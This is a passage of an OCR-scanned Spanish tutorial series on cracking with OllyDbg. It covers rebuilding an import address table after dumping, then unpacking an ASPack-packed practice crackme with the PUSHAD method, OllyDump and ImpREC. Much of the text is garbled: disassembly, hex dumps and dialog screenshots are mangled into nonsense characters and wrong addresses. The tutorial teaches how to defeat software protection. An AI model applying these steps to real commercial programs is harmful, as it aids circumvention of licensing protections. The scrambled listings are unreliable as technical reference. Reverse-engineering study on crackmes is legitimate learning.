j poBG160a [0D 00100000 SizeO0fHeapReserve = [80000 (1648676. J 


15] 66100000 ¡DD 66BB1ODa SizeO0fHeaplommit = 1006 (4096, ) 
1040 60660009 ¡0D 60BBBBama LoaderF lags = BM 
1040 10000009 ¡DD 6000mB1a NumberO0fRuaAndSizes = 16 (16. 
0040 160400000 DD 60004000 Export Table address = 4060 
[5]5] 46000000 |DD 60000046 Export Table size = 46 (7D. 
00400 10151515 1 01851515151=151513] Import Table address = B00B 
40400 640000098 [DD 0004064 Import Table size = 64 (100,) 
1400 (515]=1515]5]5]5) ms ls1s15 13151515) Resource Table address = ABBA 
Bn EG040006 DD 600004 En Resource Table size = 4E6 (1248,) 
lala) (s/51515/5]5]5]5] mus ls 151515151515) Exception Table address = MB 
400 (5/51515/515]515) sis ls 1515151515) Exception Table size = 


Vemos que la IT esta ahora en BO000 o sea 40B000 que es la direccion de la seccion que agrego el 
IMP REC vayamos a ver alli quitando el modo SPECIAL. 


LVunmped_ .£Modu LeEntryFoLnt > 


Meco 


Miit2o sa 


A 


11: J]6KillTimer. 
“BGetSystemMetri 
CS. «DBLoadCtursor 
A.J6LoadAcce lera 
torsA.mblMessageB 
eep.ubBGetWindowR 
ect. [FBLoadString 
A.*BLoadIconA. A 
LoadBitmapA. WOSe 
tFocus.. ¡BiMessag 
eBoxA. 99Post Quit 
Message. ESlWinHel 
pA. .¿GBInvalidate 
Rect..28 Translat 
eAccelerator. 06 
Movellindow. .“8Tr 
anslateMessage.. 
—BLoadMenuA. 08Sh 
owlindow. .<SSend 
MessageA. .16SetT 
imer. .¿38SetlWindo 
wPos. .*S8lUpdateli 
ndow. .t9Register 
ClassA..A.BeginP 
aint..a.Createli 
ndowExA.A.Deflin 
dowProcA..f.Dial 
ogBoxParamA.ó.Di 
spatchMessageñ. . 


Alli vemos la IT tal cual la vimos en la parte anterior, unicada en otra direccion pero completamente 
funcional, si queremos podemos hallar los punteros como en la parte anterior para repasar. 


Dumped_ .<Modu leEntruPoint> 


lennon. .... 


lB.ollccocono co. 


no nnnnaolas .. 


11. J6KkillTimer. 


AAA Dr tr mr vi 


Alli vemos el primer IID correspondiente a la primera dll, cuyo 4tÉb DWORD nos apunta a su 
nombre como vimos, en este caso el nombre de la dll estara en BO078 o sea 40B078. 


DS 
DO4BBBES 
BO4BBBFS 
ARGARIAR E ER A 2175 7: anñA. laSetF nia... 


Es user32.dll. 


Y el 5to puntero como vimos en la parte anterior apuntara a la primera entrada de la IAT, en este 
caso el 5to puntero es 3184 por lo tanto la primera entrada de la IAT estara en 403184 como 
habiamos visto que era el inicio de la IAT al reconstruirla. 


+¡0w3-Ewñ IOwúEw 
« 10wt -Dw-T0w1 TE 
¿ADWDEWEIWBEw 
DidWEREWPDEWH+AdI 


¡SEWÁIOW. HEwdlá Ti 
BrEW. Hr iúkei 
aio El 03 web: 
eii derinteRd 1 


Adiiear WIFI 

-|"Win"Waso. 1174 
66 00 00 060 60 00 00 00 dl6U-F SV... ..... 
560 00 00 00 60 00 00 MO ...ooooommo..... 
50 00 00 00 60 DO 00 MO ...ooooommoo.... 


B4 00 00 00 60 00 BO 00 BDO coccccccooor 
ARAAZITA 66 6aA A AR AA AR AR AR 


Y por supuesto la primera entrada de la IAT ahora tiene el valor de la api pero si vemos en el 
ejecutable, antes de ser sobreescrita por el sistema con la direccion de la api en mi maquina, debe 
tener el puntero al nombre de la api, que llenara dicha entrada si vemos. 


AA LIA 


66 06 00 65 
60 09 00 4n 
77 2F_D1 77 3E 0B D2 


Backup 
Copy 
Binary 
Label 
Breakpoint 

Search for 

Follow DWORD in Disassemble 
Follow DWORD in Dump 

Find references 


DODDIANDO AUN 


En ME MO ETA zan Ll E 


isa 


mm: SiC. 


¿a=mo- 


En esa entrada de la IAT en el ejecutable, existe el valor BO84 que corresponde a 40B084, donde 
deberia estar el nombre de la API que llenara esta entrada. 


O AAA A 


etr 
bl A dd 16 
4C 6F 61 64 41 63 63 65 6€C 65 72 61 74 6F 72 73|LoadAcce lerators 
41 00 DC 61 4D 65 73 73 61 67 65 42 65 65 70 00| A.mbiilessageBeep. 
75 61 47 65 74 57 69 6E 64 6F 77 52 65 63 74 00|ubiGetWindowRect . 
C9 M1 4C EF 61 64 53 74 72 69 6E 67 41 BB EC B1| [rBLoadStringA.*6 


aaa 
MO5nDD: 
Tk 


La cual es KillTimer. 


Vemos que el IMP REC realizo un trabajo estupendo, detecto cada api, construyo la IT nuevamente 
arreglando todos los punteros, y reconstruyo la lista de nombres de cada api para que al arrancar el 
sistema sepa que api debe llenar cada entrada de la IAT una verdadera maravilla. 


Bueno esta ha sido nuestra primera reconstrucion de una IAT la mas sencilla que puede existir, pero 
es la base de todo y es importante que tanto la parte anterior como esta, la tengan bien claro, porque 
a medida que sigamos desempacando nos encontraremos con IATs completemente destrozadas, apis 
redireccionadas y casos dificiles, para los cuales es imprescindible haber entendido bien comno 
trabaja todo. 

Ademas este packer no tiene antidumps que es la parte que aun no vimos ya que no fue necesario, 
pero a medida que vayamos avanzando en la complejidad de los packers ya encontraremos casos 
con ANTIDUMP. 

De cualquier manera iremos incrementando la dificultad suavemente para que se les vaya fijando 
los conceptos asi que no se asusten, vamos de a poquito jejejejeje 


Hasta la parte 35 
Ricardo Narvaja 
05/03/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 35 


Seguiremos practicando y desempacando cada vez con packers mas dificiles, aumentando 
levemente el grado de dificultad. 


El siguiente packer en la escala de dificultad es el aspack, casi muy parecido al UPX, y para el cual 
ya tenemos el crackme UnPackMe_ASPack2.12.exe que se envio en partes anteriores, al cual 
ademas ya le habiamos encontrado el OEP. 


Coloco para practicar la dll del OLLUYDUMP en la carpeta de plugins ya que lo dumpeare con el 
mismo. 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/L-M-N-O- 
P/Plugins_Olly/OllyDump%20parche%20de%20parasito.rar 


user y pass:hola 
Esa es la ultima version, parcheado algun bug que tenia por Parasito. 


Abremos el OLLYDBG protegido con los plugins para ocultarlo, y lleguemos al OEP con el 
metodo el PUSHAD. 


Entry Point Alert 


Module 'UnPackMe' has entry point outside the code (as specified in the PE header). Maybe this file is self-extractimg 
or self-modifying. Please keep it in mind when setting breakpoints! 


Vemos que aquí nos avisa que el entry point esta fuera de la seccion code como es lo usual, en la 
mayoria de los packers. 


SEE, EL. vil a] +] LJ ejm/T]wjH[c]//x]B]R]-..] s 


UnPackMe. 00411064 


004116621 . E 43000000 


641 1545C 
60411500 
0041150E 


604115059 | Ps 
6041150B : 


00411500F 

Bn411610 

664115611 

6411612 

Ba411614| . 5D Pl 

BO411615| . BB EDFFFFFF U 

BB41161A| . 683DD A De 
Ba4115B1C S1EB 0010010 


U 
33BD 22040001 CMP DWORD PTR SS: [EBP+422],0 
399D 22040001 MOU 


a. DWORD _PTR SS: CEBP+422],EBX 
F| .v BF85 65030001 JNZ 16411394 
S| . $8D35 2£040901 LEA EAX, DWORD PTR SS: CEBP+42E] 


Bn411022 


D 


UnPackMe. 0041139A 


1 
6641153 


Ahi vemos el PUSHAD inicial al cual pasamos con f7 y luego hacemos. 


Registers (FPU) 

EAX BOBBBBDa 

ECX BB12FFEO 

EDX 7C91EB94 ntdll.KiFastSystenmCal lRet 
EBX 7FFDBOOa 
ESP 'BA1 


AOS 


5 : 
EDI 7C920738 Decrement ñ 
EIP 00411002| Zero 

CO ES 0023 

A 

¿5 A: 
Tó 65 0600 Copy sel ción to clipl en C 
Da Copy all registers to clipboard 
DO LastErr 


STO empty —-Ul A 
sT1 erosy a. Follow in Stack 
ST2 empty B. 


dE plo as View MMX registers 


ESP-FOLLOW IN DUMP para colocar un Hardware Breakpoint on accesss en los valores de los 
registros que guardo con el PUSHAD en el DUMP. 


LLE e / 

oia do moy E pino 
Breakpoint 4 Memory, on access 
Search for » Memory, on write 


Follow DWORD in Disassembler 


Follow DWORD in Dump | 
Goto » 


Hardware, on write 
Hardware, on execution 


s4 Her » 
Luego apeto F9 con lo cual doy RUN 
PEVES | 0 _— a 8J “857 OOOO DOS OS IO OS IO ROSS IS A IA 10 E 


Es 61600000 |MOU EAX, 1 
C2 6con 
68 00404000 | PUSH 404000 


ys OA AMARA AL OA MAA ATA AA PAPA AA A 


E as UNZ SHORT 0041138A UnPackMe. 804113BA 


Con lo cual para justo despues del POPAD que restaura los valores guardados a los registros, traceo 
hasta llegar al OEP con f7. 


rue WIN POD e ES YM II nep 


dul + 1/e)m]T)w)n/c]4[x]8/Rr]-Js] ¿3% 


Real entry point of SFX code 


CHAR *-* 


CHAR "*” 
CHAR "a” 


CHAR *U” 


ID 


IDE 


Como veo que no se entiende el codigo, le quito el analisis. 


DBES 
9B 


DBE2 
ES 00604000 


89E5 
ES 91030000 
68 DBBBODOD 
FF1S F4114000 
As e7FO4a00 
| 8925 OBFO4000 
|. ES 30000000 
¿| 8625 BBFa4DOO 
ES A9OS0BaD 
ES _FOG30000 


FINIT 
WAIT 


FCLEX 

FLOCW WORD PTR DS: [4060007 
PUSH_EBP 

MOU EBP,ESP 

PUSH O 

pa DWORD PTR DS: [46F007 7, EAX 
MOU DWORD _PTR DS: [40F00E7,ESP 
MOU ESP, DWORD PTR DS: [40F00B] 
POPAD 


UnPackMe. 40464395 
kerne 132, GetModu leHandleA 


UnPackMe. 004040609 


UnPackMe. 004643ES 
UnPackMe. 0046443E 


Y vemos que si lo vuelvo a analizar mejora aun mas. 


DBES 


DOS 


1 
104 
m6 
D 
F 
ña 
”) 
F 
4 
5 
E 
a 


Do 
A 
DD 


F 
F 


DBE2 FCLEX 
D92D 60664001 FLOCW WORD PTR DS: [4060007 
55 PUSH_EBP 


. FF1S F4114001 


Es FOB3000B 
89EC 

5D 

F35 D4F1400 
F15 EC11400 


DBE2 FCLEX 
D92D 60684001 FLOCW WORD PTR DS: [4060007 
na nroT 


a EI” piel $0) ul +] 1]2e/m/T]wn]c/+]x]8[Rr]-]s| 33 


Real entry point of SFX code 


29ES MOU EBP,ESP 

ES 910230000 UnPackMe. B04043A5 

68 000900008 |PUSH B pModu le = NULL 
GetModu leHandleA 

AS 07F04008 |MOU DWORD PTR DS:[40F097],EAX 

6D PUSHAD 

2925 BBFO4001 MOU DWORD PTR DS: [40F0BB],ESP 

E9 30000009 | JMP B64B04060 UnPackMe. 00404060 

8625 9684901 NOU ESP, DWORD PTR DS: [40F00B] 

ES A9BS0000 UnPackMe. 004048E5 
UnPackMe. 0040443E 


POP ESP, EBP 
PUSH DWORD PTR DS: [40F104] 


WAIT 


ExitCode = 9 
ExitProcess 


- 
> 
m 
[11] 
— 
.. 


Options Wind window Help 


1 HideOD » [2 1)Elm/T]w/H)e 


2 CommandBar » 
3 Puntos Mágicos » 
4 +BP-OLLY 


OllyDump - UnPackMe_ASPack2.12.exe 


Start Address: [400000 Size: h 5000 
Entry Point: [1001 -> Modify: [4000 Get ElP as DEP | Cancel | 


Base of Code: [4000 Base of Data: [1000 


ÍV Fix Raw Size ke Difset of Dump Image 


| Section | Virtual Size_ | Virtual Offset Raw Offset 


.idata 00001000 00001000 00001000 00001000 C0000040 
.ISIC 00002000 00002000 00002000 00002000 C0000040 
text 00002000 00004000 00002000 00004000 C0000040 
«data 00001000 00006000 00001000 00006000 C0000040 
.bss 00009000 00007000 00009000 0007000 C0000040 
IMPOR... 00001000 00010000 00001000 00010000 C0000040 
teddy 00003000 00011000 00003000 00011000 C0000040 
sadata 00001000 00014000 00001000 00014000 ni 


[Y Rebuild Import 
(+ Method1 : Search JMP[API] | CALL[API] in memory image 
C Method2: Search DLL £ 4PI name string in dumped file 


Nos aparece la ventana del plugin, en la cual ya vemos las cositas que podemos modificar, ya ahi 
podemos arreglar lo de la base of code, sin tener que luego cambiarlo en el header, en la ventana 
vemos base of code 4000, pero si recordamos este aspack corria en esta seccion que no es la 
primera, por lo cual le dejamos la base of code en 4000 que corresponde a 404000 que es la seccion 
donde esta el OEP y corre el programa. 


Otro de los temas es la tilde de REBUILD IMPORT que esta abajo, el OLLYDUMP trata de hacer 
el trabajo del IMP REC para lo cual tiene dos opciones METHOD1 y METHOD, que en algun 
packer sencillo puede funcionar, el que quiere a veces ganar tiempo, puede hacer un dumpeado con 
cada uno de estos metodos y ver si alguno funciona, aunque no es muy certero, pero alguna vez 
puede funcionar. 


Nosotros le quitaremos la tilde en REBUILD IMPORT ya que lo haremos con el IMP REC que es 
mas confiable. 


OllyDump - UnPackMe_ASPack2.12.exe 


Start Address: [400000 Size: h 5000 
Entry Point: [11001 > Modify: [4000 Get ElP as DEP | Cancel | 


Base of Code: [4000 Base of Data: 1000 


ÍV. Fix Raw Size 8: Difset of Dump Image 


_Section | Virtual Size_ | Virtual Difset | Raw Size___| Raw Ofíset 


data 00001000 00001000 00001000 00001000 Co000040 
ISI 00002000 00002000 00002000 00002000 Co000040 
text 00002000 00004000 00002000 00004000 C0000040 
«data 00001000 0006000 00001000 DO006000 C0000040 
.bss 00009000 00007000 00009000 00007000 C0000040 
IMPOR... 00001000 00010000 00001000 00010000 C0000040 
teddy 00003000 00011000 00003000 00011000 C0000040 
sadata 00001000 00014000 00001000 00014000 C0000040 


(e : Search JMP[4PI] | CALL[API] in memory image 
CC Method2 : Search DLL 8: 4PI name string in dumped file 


Bueno ahora podemos dumpear a ver que tal nos va. 


1 F — LA 


vents and Settings|RicardolEscritorio_ESCRITORIO101-Crackme 
A 


o y carpeta 2, CRACKME.EXE Dumped.exe 


3 Dumped_.bak 
Dumped_.exe Archivo BAK 
38 KB 


eaeste 


hiwo 


:hivo 
rchivo en Web 


hivo por correo bitarts_evaluation.c.exe 


“chivo 


y) UnPackMe_tElock0,98,exe 


4 


Pues alli esta el dumpeado si lo ejecuto sin reparar la ¡at o bien correra solo en mi maquina con 
mucha suerte, o bien dara error veamos. 


dumpaspack.exe - Error de la aplicación 


(X La aplicación no se ha podido inicializar correctamente (0xc0000005). Haga clic en Aceptar para terminar la aplicación. 


Bueno sin cerrar el archivo empacado que esta detenido en el OEP abrimos el IMP REC y elegimos 
dicho proceso en la lista del menu desplegable. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 
Alttach to an Áctive Process 


c:4+odbg110 finalparcheado 4.exe (O00001F8] 

c4archivos de programa! techsmithksnagit 8*tschelp.exe [(OOOOOC3C] 
ci 4archivos de programattechsmithhsnagit 81 snagit32.exe (OOODOB 78] 
c:4archivos de programa! yahoo!tmessenger'ypager.exe (ODOO048C] 
c4archivos de programa operatopera.exe [ODODOFOC] 

c:Ashttpsthttp. exe (OOODOE 98] 

cmwindowstsystem324svchost.exe [00000048] 
ctmindowsisystem32salg. 


— New Import Infos (ID+4SCI+LOADER)— Options | 
Ava [D00ODODO Size [00000000 aa] 
About 


EW SECUon 


147 Infos needed 


00000000 


DEP 


Volvemos al OLLYDBG para hallar los valores de INICIO DE IAT, LARGO y el OEP. 
OEP es 404000 o sea que en el IMP REC ya que le debemos restar la imagebase que es 400000, 
quedara 4000. 


Buscaremos el inicio y final de la iat como vimos para ellos hay que buscar una llamada a una api, 
justo abajo del oep esta la llamada a GetModulehandleA. 


89ES 
En ria 


DE 
DO 


o 
DS 
DA 


Dd 


DI 


mí 
DO 


mí 
Y 


DD 


Dar Dí 
SS 


y 


y A 


DD 


mí 
Lao 


..... +... +... q... 2 1. 


jala) 
PELE Fá11400 
AS 67F04000 |MOU DWORD PTR DS: [40F007],ERX 
60 PUSHAD 


< 


DBE2 CLEX 

D92D 00604001 FLOCW WORD PTR DS: [4060006] 
55 PUSH_EBP 

MOU EBP,ESP 


Real entry point of SFX code 


UnPackMe. 004843A5 
pModule = NULL 
GetModu leHandleA 


yw 


ES 91930090 UnPack! 
68 BOBBBBDaA |PUSH A pModu le 
FF1S F4114001 fetMarka 
AS 67F64000 |MOU DWORD PTR DS: [40F007],EAX bi 
60 PUSHAD P 
3925 BBFO400l MOV DWORD PTR DS: [40F00B],ESP Copy 
E9 30000000 | JMP 00404060 
38B25 BBFO400l MOV ESP,DWORD PTR DS: [40FO00B] Binary 
ÉS A9OSOBAn CALL bl 
ES FOB30000 Arola 
S9EC MOU ESP,EBP Label 
5D POP EBP 
FF25 D4F1400l PUSH DWORD PTR DS:[40F1D4] Comment 
FF1S EC11400 Ñ 
9B AIT Breakpoint 
DBEZ FCLEX y 
0920 606040901 FLOCW WORD PTR DS: [406000] Hit trace 
CS Run trace 
! Mama arinin hara 


[c] File View Debug Plugins Options Window Help 


LEEN en] ESE] $0) 0) + 1]e/m)T][wH]c//JK]8/R]--/s] 3 


8BEC 

337D_ 603 Ba 
74 13 

FF7S 08 

Es 68200000 
3500 

74 08 

FF7O 04 

E F4300000 


3B40_08 
EBSEE 
90 


na 


a 


EBP 
hod" EBP,ESP 
CMP_DWORD_PTR_SS: [EBP+8],0 


PUSH DWORD _PTR SS: [EBP+8] 
TEST EAX,EAX 

PUSH DWORD PTR DS: [EAX+4] 
PA 


C2 6400 
64:A1 18000000|MOU EAX,DWORD PTR FS:[18] 
3640 308 MOU EAX, DWORD PTR DS: [EAX+307 


mou ORO PTR_ DS: [EAX+8] 


NOP 


hna 


kerne 132. 7C84B54C 
kerne 132. 7C80E2A4 
kerne 132. 7C8BB548 
kerne 132. GetModu leHand ely 


kerne 132. 7C3BB548 


Veo que va directamente a la api sin JMPS INDIRECTOS intermedios por lo menos en esta 


llamada , 


siempre los usa como en este caso) 


(ya que si buscamos veremos que si hay JMPS INDIRECTOS lo que pasa es que no 


Quiere decir aquí usa un CALL INDIRECTO, para saltar a la api, por lo cual es facil deducir que 
lee la direccion de la API directamente de la IAT para saltar a la misma correctamente. 


EA ol cl PL ai AE la al 3 Y Y y) Y 
B0404uaC| . $5 PUSH_EBP 
404000] + 89ES MOU EBP,ESP 
o040400F| . Es s1asaeea | CALL BB4BASAS 
PUSH 8 


po4B4014| . 68 BUBOBOGO 
AS 67F04000 E : 

15] PUSHAD 

3925 0BFO4001 MOU DWORD PTR DS: [49F 
E9 300090000 

8B25 0BFO04001 MOV _ESP,DWORD PTR DS: [41 
6l POPAD 


ES A90S900Ba 
Es FDO30008 
B89EC 


% 


MOU ESP,EBP 


5D 
FFSS D4F14001 PUSH DWORD PTR DS: [40F1D4] 
ER EC114601 CALL DWORD PTR DS: [4011EC] 


0 
DBE2 FCLEX 
AE 90604001 FLOCW WORD PTR DS: [406000] 


> ES B000BB0a |PUSH_O 

. B3 4604000 |MOU EAX, 406044 ASCI 
902 MOU EDX, EAX 

52 PUSH_EDX 

Es 22604000 |MOU EAX, 406022 ASCI 
89Cc6 mMOU ES AR 

Aral 
UnPa 


56 
ES 180F0009 
2907 


au4B4B7C| . 57 
an4B407D| . ES 6000004 


Bueno es facil de ver que 4011F4 es una entrada de la IAT donde guarda la direccion de la API, 
GetModuleHandleA. 
El que gusta de ver los JMPS INDIRECTOS, buscando con FF 25 tambien los hallara. 


e eu] vie] eje] a] il PERPERSERECPERA ESFiKdM 


erne 

kerne 132. Aetoda Lefland led 
user32.Cal lNextHookEx 
kerne132.GetCurrentThreadId 
user32.GetDesktopllindow 
user32.GetlindowRect 
ntdll.RtlAl locateHeap 

kerne 132. HeapCompact 
kernel32.Heaplreate 
kerne132, HeapDestroy 
ntdll.RtlFreeHeap 
user32.MessageBoxA 
user32.SetlWlindowsHookExA 
user32.SystemParametersInfoA 
user32.UnhookwindowsHook Ex 
kernel32. |strcatA 
kernel32.GlobalAl loc 
kernel32.GlobalFree 


DE 
DOS 
DO 


Y 
Y 


Y llegara al mismo resultado ya que el JMP a GetModulehandleA lee valores de la misma entrada 
de la IAT. 


Vayamos en el DUMP a mirar dicha entrada y la IAT en general. 


dolo 
ISO OO 
2 ld 


D FF 80 7C | 2F FE 80 7C D4 65 92 7C 
YC 29 81 7C 10 11 Si 7C 3D 04 92 7C 
TC Bo 06 09 560 66 09 50 66 06 00 6n 
BB 00 60 00 00 BO 00 00 BO 00 DO ..ocncccnoonoor 

Da ua 00 60 00 00 BO 00 00 BO 00 00 ..onccocmococmo... 


rara Cata Cara daña (aía (afa (Sara (ara (ata Cata (ara (afa (afa 


ARI Ci“RCIERE: 
«Be ¡JJ 1 mi 1=0E; 
lloc ooomm..... 


Do 
y 


Alli vemos todas las entradas que son compañeras de la que miramos inicialmente, todas van a la 
seccion code de la misma dll, miremos en VIEW-M a que dll corresponden. 


Do un 
va ua 


BB 00 [5] 

AR AR A A M N 
77EF1000] 00042000] GDI32 «text code, importj Imag|R RWE 
77F33000/| 00991000| GDI32 «data data Imag|R RWE 
77F34000| 00061600| GDI32 «PSro resources Imag|R RUE 
77F35000| 00062000 | GDIS2 .«reloc relocations| Imag|R RWE 
7CS800000 00001000 | kerne 132 PE header Imag|R RWE 

=J5 66632000 kernel32 .text code, import: Imag|R RUE 

a B0005000|kernel32| data data Imag|R RWE 

00073009 kernel32| .rsrc Tesources Imag|R RWE 

B6BB600O|kernel32| .reloc relocations| Imag|R RWE 

60001009 ntdll PE header Imag|R RWE 

6607B000|ntdll «text code, export: Imag|R RWE 

600565000 |ntdll ¿data data Imag|R RWE 

B632000|ntdll "PSro Tesources Imag|R RWE 

7C9C3000 | 600683000 |ntdll .«reloc relocations| Imag|R RUE 

7F6FO000| BOBO7DBO Map ¡[RE RE 
7FFB0000| 00024000 Map |R R 
7FFDDO00 | 00901000 data block (Priv|Ru Ru 
7FFDEO00| 00001000 PriviRu Ru 
7FFE0000| 00061000 PriviR R 


Todas caen dentro de dicha seccion, por lo cual vemos que son las entradas que corresponden a 
Kernel32.dll ya que apuntan a su seccion CODE. 


Alli mismo podemos ver el final de la IAT ya que debajo de 401218 no hay mas nada, asi que el 
final de la ¡at es 401218, ahora nos queda hallar el inicio. 


go 40 Bo 
ga 40 [ls] 
ga a Ba 
AA AR AR 


b 
B 


Cata Cara (ara (aía 


Que son exactamente estas entradas, vemos que en las direcciones adonde apuntan (10xx o 11xx) 
no hay dlls ni nada ya que la mas baja direccion en el mapa de memoria es 10000. 


eS] PIE VIEW UCUUY | FUQliISs  —QpPLUDIS — Y"YIIUUYY ME 


BO0B20000 
6127000 
66123000 stack of ma 
60130000 [s] 

90140000 
690150000 
560250000 | BOBBSBDA 
60260000 | BOBB30DA 
60270000 | 6OB16000 PS 
500290000 | 0BB3DBBA xDevicerHarddis 
90200000 | 00041000 Device sHarddis 
00320000 | BBBBE6DBN xDevicerHarddis 
560330000 /| 00041000 
560330000 /| 00001000 
560390000 /| 60BB10Ba 
50390000 | 00BB1ODO 
50380000 | 00BB10Ba 
504900000 | 090991000 | UnPackMe PE header 
60401000| 00001000 | UnPackMe' . idata Imag 
500402000 | 60902000 | UnPackMe| esco Tesources Imag 
60404000| 00062000 | UnPackMe| .text code Imag 
60406000 | 00061000 | UnPackMe| .data code, data Imag 
604097000 | 00009000 | UnPackMe| .bss code Imag 
00410000 /| 09961000 | UnPackMe| IMPORTS | code 

500411000! 60003900 | UnPackMe! . teddy SFX, imports! Imag 
90414000 | 009910900 | UnPackMe!| .adata Imag 
00420000 | BOBBADOO 
004E0000 | BBBB2000 
5004F0000 | 00103000 
60600000 | 00135000 


SA mal Anna mr 


xDevicerHarddis 


mm 


js o os e a o a a o a a a a o a o a 


Asi que estas entradas ya que no van ni a una dll, ni a una seccion real, ya que podrian apuntar a 
alguna seccion creada por el packer, lo cual no es este caso, son basura metida para molestar ya 
veremos lo que hacemos con ellas, ahora sigamos subiendo. 


28... .[strcatH.. 
USER32. DLL. KERNE 
L32.DLL.<»..Nb.. 
b»..r»..Cr..ób.. 
A II 
EAIWOSO 'WUtEWE. Ev 
A. EW. .TP 

a4 


Vemos que entre ceros hay otro grupo de entradas que apuntan a direcciones 77Dxxxxx veamos en 
el mapa de memoria a que dll pertenecen. 


1B04E0000| BOBO2000 Map [RE RE 
B04F0000/| 00103000 Map |R R 
60600000 | 0013000 Map ¡RE RE 
77010000 | 6060019000 user32 PE header Imag|R RWE 
77011000 BB00SFDOO userd2 .tent code, import: Imag R RWE 
7D? 6) 00002000) user32 «data data Imag|R RWE 
77D? B0B2B000|user32 ¿«1Sro resources Imag|R RWE 
77D9 00003000 | user32 ¿.reloc |relocations| Imag|R RWE 
TEFO 90001000 GDI32 PE header Imag|R RWE 
77EF10044 00042000 | GDIS2 .«tent code, import; Imag|R RUE 
77F33000 40901000 | GDI32 «data data Imag|R RWE 
77F34000) B6001060/| GDI32 ¿PSro TesoUurces Imag|R RWE 
77F35000| 00002000 | GDI32 «reloc relocations| Imag|R RWE 
70300000 | 009001000 | kerne 132 PE header Imag|R RWE 
7C801000| 00082000 | kernel32| .text code, import; Imag|R RWE 
7C883000| 060065900 | kerne132| .data data Imag|R RWE 
7C8838000| 006073000 | kernel32| .rsro resources Imag|R RWE 
7CS8FB000| 0006069000 | kerne 132 .reloc relocations| Imag|R RWE 
70910000 | 000019000 /ntdll PE header Imag|R RWE 
7C911000/ 00078900 |ntdll ¿text code, export: Imag|R RWE 
709280000 | B0BBSBBO|ntdll «data data Imag|R RWE 
7C991000| 00032000 /ntdll «PSro resources Imag|R RUE 
7C9C3000| 00063900 |ntdll .«reloc relocations| Imag|R RWE 
7F6FO000| BOBB7DBA Map ¡RE RE 
7FFB90000| 00024000 Map |R R 
7FFDDO00 | 60001000 data block «Priv|Rú Ru 
7FFDEO00| 009001000 Priv! Ru Ru 
7FFE0000| 00BB10Ba PriviR R 


Vemos que pertenecen a la User32.dll 


Tambien vemos que hay mas dlls en el mapa de memoria como GDI32 y Ntdll las cuales pueden 
haber sido cargadas por el packer para su uso, y no la usa el programa, para verificar esto, hagamos 


en el mismo listado SEARCH FOR — ALL INTERMODULAR CALLS. 


Go to 
Follow in Dump 


i i torlal... 1 
k it write a tutorial Z 


Search For » Name (label) in current module Ctrl- 
Find references to » Name in all modules 
74 3104 View » 
1145 52 41 Command Ctrl- 
var 16 a Copy to executable » 
1194 16 al j Sequence of commands Ctrl- 
ED EE ph Analysis » 
E Constant 
ios 10 ol Dump debugged process Bl ia cl 
O | inary string rl- 
1116 11 al 
1140 11 al E 
35 35 2 Appearance » Next Ctrl 
D4 BS 
04 All intermodular calls 


( 
( 


NI LED ES dl 


YM PI 


All commands 
All sequences 


nap 


Disassemb ly 
Ti 


00404519 


l CPU selection) 


DS: [4011F4] GetModu leHandleA 
0404044 DWORD PTR DS: [4611EC] Ex itProcess 
BB04042B6 DWORD PTR DS: [461214] IstrcatA 
BB4043E3 DWORD PTR DS: [461208] HeapCreate 
0404514 DWORD PTR DS: [461200] HeapDestroy 
BB40457F DWORD PTR DS: [4612007 
BB4B045B2 DWORD PTR DS: [401204] y HeapCompact 
BB4B45CE DWORD PTR DS: [4012007 «RtlAl locateHeap 
50404660 DWORD PTR DS: [461210] «RtlFreeHeap 
1B4B04BA? DWORD PTR DS: [4011B0] E SystemParametersInfoA 
BO4D4EF6 DWORD PTR DS: [461190] Y 
BB404COF DWORD PTR DS: [461194] “Y 
BB404E32 DWORD PTR DS: [46119C] 
BO0404F19 DWORD PTR DS: [4611F0] k GetCurrentThreadId 
BO0404F34 DWORD PTR DS: [4611AC] SetllindowsHookExA 
Ba4D4FS9 DWORD PTR DS: [401148] MessageBoxA 
BB404F6B DWORD PTR DS: [461184] UnhookW indowsHookEx 
10405594 DWORD PTR DS: [4611FCI GlobalFree 
BB40575E DWORD PTR DS: [4611F8] GlobalAl loc 


Vemos que hay llamadas a 3 dll, las dos que hallamos y falta arreglar la Ntdll ya que hay llamados a 


la misma, veamos. 


Si vamos a los calls de esas dll por ejemplo. 


MOU EAX, 40F 


. ES 10F04000 b10 
._ FFSO PUSH DWORD PTR DS: [EAX] 


FF1S 0012401 
389c2 


MOV EDX, ERX 
POP ESI 


yl 


3916 
an45 FR 


> 134) 45 M9 40] $ Y E] 1 M4] E] 4 


ntdll.RtlAl locateHeap 


MOU DWORD PTR DS: [ESIJ,EDX 
LFA FAX. MMINRA PTR SS: PFRP-41 


dl 


FuciJAGi- € 
Es! “BS 1)J41 or 
=0/E “il LA AO 


Lo mismo la otra de dicha dll esta tambien mezclada con las de kernel32.d1l no nos dimos cuenta 
por la proximidad de las secciones code de ambas pero es asi. 


Es 10F04000 |MOU EAX, 40F010 
FF30 PUSH DWORD PTR DS: CEAXx] 


+ FF1S 10124001 CALL_DWORD PTR DS: [401210] ntdLL.Rt lFreeHeap 
- ¡8902 MOU EDX, EAX 

SE POP ESI 

. 8916 MOU DWORD PTR DS: [ESI],EDX 


Fl 
a 
] 


o) por 


so) 


Aaa 


y 


DO wDO 


aaa 
od 


y 
y 
de 
Y 
Y 


DOANOaO 


Bueno vemos algunos problemas en esto de cualquier forma el inicio de la IAT, es el que abarca 
todas las entradas asi que 


EP. .0P. 
duduy DEAD w 
DAEWE.EWa. EW o. 


4.. 

0700! JAGI- Ci 
(IES ¡De iJJÚ! 
Mii¡=0E: ilAdl.... 


k tPr 
«Se ne Aia andleA 
ETTAYE Cal |NextHookEx 
ke arrentThreadId 
esk top indow 
ndowRect 
«RtlAlloc Aero 
He 


Du 


DI 


DOS 


Vemos que es el mas pequeño de todos estos valores, asi que ya tenemos 


OEP=4000 
RVA o INICIO DE LA IAT=119C 
LARGO= FINAL MENOS INICIO= 401218-40119c = 7C 


HEX:70 - DEC: 124 - ASCII: | 


Pongamos estos valores en el IMP REC a ver que pasa, veamos que paso con las dos entradas que 
estaban mezcladas de la ntdll con las de kernel32. 


AS 


+- user32. dll FThunk:0000119C NbFune:? (decimal: 7] valid YES 
+-?FThunk:0000118C NbFunc:B (decimal:11] valid:NO 
GB kemnel32. dll FThunk:000011EC NbFunc:B [decimal:11) valid YES 


h 


Vemos la parte que dice NO que corresponde a las entradas basura, y abajo vemos que solo tiene 
entradas para kernel32, si miramos las entradas raras que correspondian a 401200 y 401210, vemos 
que 


